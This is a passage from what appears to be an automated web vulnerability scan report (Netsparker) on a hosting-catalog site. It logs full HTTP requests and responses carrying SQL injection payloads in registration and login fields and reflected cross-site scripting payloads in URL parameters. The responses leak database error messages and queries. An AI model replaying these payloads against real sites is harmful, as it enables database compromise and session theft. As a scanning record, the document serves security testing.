company_name='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=3&province=3&zip=3&country=225&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith©_from_cont=1&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:37:41 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 448 Connection: close Content-Type: text/html; charset=UTF-8 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 1 in SQL SELECT account_id FROM account WHERE company_name=''+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +''
Parameters
Parameter
Type
Value
company_name
POST
Smith
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
3
province
POST
3
zip
POST
3
country
POST
225
phone
POST
3
e_mail
POST
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
account_type
POST
1
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
copy_from_cont
POST
1
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 629 Accept-Encoding: gzip, deflate company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=3&province=3&zip=3&country=225&phone=3&e_mail='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith©_from_cont=1&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:39:44 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 443 Connection: close Content-Type: text/html; charset=UTF-8 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+' at line 1 in SQL SELECT account_id FROM account WHERE e_mail=''+ (select convert(int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+char(109)+char(109)+char(97)) from syscolumns) +''
Parameters
Parameter
Type
Value
company_name
POST
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
11
province
POST
3
zip
POST
3
country
POST
12
phone
POST
3
e_mail
POST
netsparker@example.com
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
copy_from_cont
POST
1
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 633 Accept-Encoding: gzip, deflate company_name='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=11&province=3&zip=3&country=12&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith©_from_cont=1&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:58:52 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 448 Connection: close Content-Type: text/html; charset=UTF-8 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 1 in SQL SELECT account_id FROM account WHERE company_name=''+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +''
Parameters
Parameter
Type
Value
company_name
POST
Smith
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
11
province
POST
3
zip
POST
3
country
POST
12
phone
POST
3
e_mail
POST
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
deposit
POST
3
promo_code
POST
3
card_type
POST
1
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
copy_from_cont
POST
1
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 614 Accept-Encoding: gzip, deflate company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=11&province=3&zip=3&country=12&phone=3&e_mail='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith©_from_cont=1&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 14:00:53 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 443 Connection: close Content-Type: text/html; charset=UTF-8 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+' at line 1 in SQL SELECT account_id FROM account WHERE e_mail=''+ (select convert(int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+char(109)+char(109)+char(97)) from syscolumns) +''
Parameters
Parameter
Type
Value
company_name
POST
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
11
province
POST
3
zip
POST
3
country
POST
12
phone
POST
3
e_mail
POST
netsparker@example.com
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
deposit
POST
3
promo_code
POST
3
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
copy_from_cont
POST
1
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 621 Accept-Encoding: gzip, deflate company_name='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=11&province=3&zip=3&country=12&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&deposit=3&promo_code=3&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith©_from_cont=1&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 14:20:39 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 448 Connection: close Content-Type: text/html; charset=UTF-8 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 1 in SQL SELECT account_id FROM account WHERE company_name=''+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +''
Parameters
Parameter
Type
Value
company_name
POST
Smith
first_name
POST
Smith
last_name
POST
Smith
address
POST
3
address2
POST
3
city
POST
3
state
POST
11
province
POST
3
zip
POST
3
country
POST
12
phone
POST
3
e_mail
POST
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
retype_e_mail
POST
netsparker@example.com
password
POST
3
retype_password
POST
3
deposit
POST
3
promo_code
POST
3
card_number
POST
3
expire_date
POST
3
owner_first_name
POST
Smith
owner_last_name
POST
Smith
copy_from_cont
POST
1
bill_address
POST
3
bill_address2
POST
3
bill_city
POST
3
bill_state
POST
3
bill_province
POST
3
bill_zip
POST
3
bill_country
POST
225
bill_phone
POST
3
Request
POST /register.php HTTP/1.1 Referer: http://www.hostingcatalog.com/register.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 602 Accept-Encoding: gzip, deflate company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=11&province=3&zip=3&country=12&phone=3&e_mail='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&deposit=3&promo_code=3&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith©_from_cont=1&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 14:22:37 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 443 Connection: close Content-Type: text/html; charset=UTF-8 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+' at line 1 in SQL SELECT account_id FROM account WHERE e_mail=''+ (select convert(int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+char(109)+char(109)+char(97)) from syscolumns) +''
Parameters
Parameter
Type
Value
temp_check
POST
755
user_login
POST
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
password
POST
3
form_field
POST
1
Request
POST /advert_login.php HTTP/1.1 Referer: http://www.hostingcatalog.com/advert_login.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 226 Accept-Encoding: gzip, deflate temp_check=755&user_login='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&password=3&form_field=1
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 14:29:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 477 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+' at line 1 in SQL SELECT account_id,password FROM account WHERE e_mail=''+ (select convert(int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+char(109)+char(109)+char(97)) from syscolumns) +'' AND active NOT IN (2,3,4)
Parameters
Parameter
Type
Value
temp_check
POST
755
user_login
POST
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
password
POST
3
remember_both
POST
1
remember_mail
POST
1
form_field
POST
1
Request
POST /advert_login.php HTTP/1.1 Referer: http://www.hostingcatalog.com/advert_login.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 258 Accept-Encoding: gzip, deflate temp_check=755&user_login='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&password=3&remember_both=1&remember_mail=1&form_field=1
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 14:35:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 477 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+' at line 1 in SQL SELECT account_id,password FROM account WHERE e_mail=''+ (select convert(int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+char(109)+char(109)+char(97)) from syscolumns) +'' AND active NOT IN (2,3,4)
Parameters
Parameter
Type
Value
temp_check
POST
755
user_login
POST
'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
password
POST
3
B1
POST
Login
form_field
POST
1
Request
POST /advert_login.php HTTP/1.1 Referer: http://www.hostingcatalog.com/advert_login.php User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Host: www.hostingcatalog.com Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24 Content-Length: 235 Accept-Encoding: gzip, deflate temp_check=755&user_login='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&password=3&B1=Login&form_field=1
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 14:40:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 477 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+' at line 1 in SQL SELECT account_id,password FROM account WHERE e_mail=''+ (select convert(int,char(95)+char(33)+char(64)+char(50)+char(100)+char(105)+char(108)+char(101)+char(109)+char(109)+char(97)) from syscolumns) +'' AND active NOT IN (2,3,4)
Cross-site Scripting
Cross-site Scripting
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (
Javascript, VbScript ) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
Hi-jacking users' active session
Changing the look of the page within the victims browser.
Mounting a successful phishing attack.
Intercept data and perform man-in-the-middle attacks.
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.
External References
Parameters
Parameter
Type
Value
param
GET
'"--></style></script><script>alert(0x00048A)</script>
Request
GET /notcharged.php?param='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00048A)%3C/script%3E HTTP/1.1 Referer: http://www.hostingcatalog.com/go.php?param=B6C08873592AFA6EF63958F6B4C144A01A3083E8994A616381B1A7B82C26F77190D5EA86683FFE5E0900EF6822A0651ED04A55D302559B9E User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.hostingcatalog.com Cookie: PHPSESSID=ptafq9e5a5qh52n7lhsaof9ea6; time_0=1303646197; user_counted_0=1%3CAND%3E%3CAND%3E24%3CAND%3E66%3CAND%3E101%3CAND%3E43%3CAND%3E46%3CAND%3E65%3CAND%3E77%3CAND%3E26%3CAND%3E29%3CAND%3E28 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 12:24:13 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 357 <html><title>Hosting Catalog</title><body><form method="get" action="http://www.hostingcatalog.com/redir.php" name="redirectForm"> <input type="hidden" name="param" value="'"--></style></script><script>netsparker(0x00048A)</script>"></form><SCRIPT LANGUAGE="JavaScript"><!-- document.forms['redirectForm'].submit();//--></SCRIPT></body></html>
- /file.php/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004CF)%3C/script%3E
Parameters
Parameter
Type
Value
URI-BASED
Raw URI
'"--></style></script><script>alert(0x0004CF)</script>
Request
GET /file.php/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004CF)%3C/script%3E HTTP/1.1 Referer: http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.hostingcatalog.com Cookie: PHPSESSID=ptafq9e5a5qh52n7lhsaof9ea6; time_0=1303646197; user_counted_0=1%3CAND%3E%3CAND%3E24%3CAND%3E66%3CAND%3E101%3CAND%3E43%3CAND%3E46%3CAND%3E65%3CAND%3E77%3CAND%3E26%3CAND%3E29%3CAND%3E28 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 12:24:16 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 338 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0004CF)</script>'' at line 1 in SQL SELECT page_id FROM page WHERE page_name='file.php/'"--></style></script><script>netsparker(0x0004CF)</script>'
- /file.php/advertiseradnetwork.txt'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004DD)%3C/script%3E
Parameters
Parameter
Type
Value
URI-BASED
Raw URI
'"--></style></script><script>alert(0x0004DD)</script>
Request
GET /file.php/advertiseradnetwork.txt'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004DD)%3C/script%3E HTTP/1.1 Referer: http://www.hostingcatalog.com/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.hostingcatalog.com Cookie: PHPSESSID=ptafq9e5a5qh52n7lhsaof9ea6; time_0=1303646197; user_counted_0=1%3CAND%3E%3CAND%3E24%3CAND%3E66%3CAND%3E101%3CAND%3E43%3CAND%3E46%3CAND%3E65%3CAND%3E77%3CAND%3E26%3CAND%3E29%3CAND%3E28 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 12:24:17 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 361 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0004DD)</script>'' at line 1 in SQL SELECT page_id FROM page WHERE page_name='file.php/advertiseradnetwork.txt'"--></style></script><script>netsparker(0x0004DD)</script>'
- /file.php/adnetworkpartnerprogram.txt'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004EE)%3C/script%3E
Parameters
Parameter
Type
Value
URI-BASED
Raw URI
'"--></style></script><script>alert(0x0004EE)</script>
Request
GET /file.php/adnetworkpartnerprogram.txt'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004EE)%3C/script%3E HTTP/1.1 Referer: http://www.hostingcatalog.com/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.hostingcatalog.com Cookie: PHPSESSID=ptafq9e5a5qh52n7lhsaof9ea6; time_0=1303646197; user_counted_0=1%3CAND%3E%3CAND%3E24%3CAND%3E66%3CAND%3E101%3CAND%3E43%3CAND%3E46%3CAND%3E65%3CAND%3E77%3CAND%3E26%3CAND%3E29%3CAND%3E28 Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 24 Apr 2011 12:24:19 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 365 Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0004EE)</script>'' at line 1 in SQL SELECT page_id FROM page WHERE page_name='file.php/adnetworkpartnerprogram.txt'"--></style></script><script>netsparker(0x0004EE)</script>'
- /file.php/faq.txt'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00072B)%3C/script%3E
Parameters
Parameter
Type
Value
URI-BASED
Raw URI
'"--></style></script><script>alert(0x00072B)</script>
Request
GET /file.php/faq.txt'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00072B)%3C/script%3E HTTP/1.1 Referer: http://www.hostingcatalog.com/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.hostingcatalog.com Cookie: PHPSESSID=ih5c11ng15cq97vpjgk3ki9jf5; time_0=1303647875; user_counted_0=%3CAND%3E101%3CAND%3E43 Accept-Encoding: gzip, deflate
Response
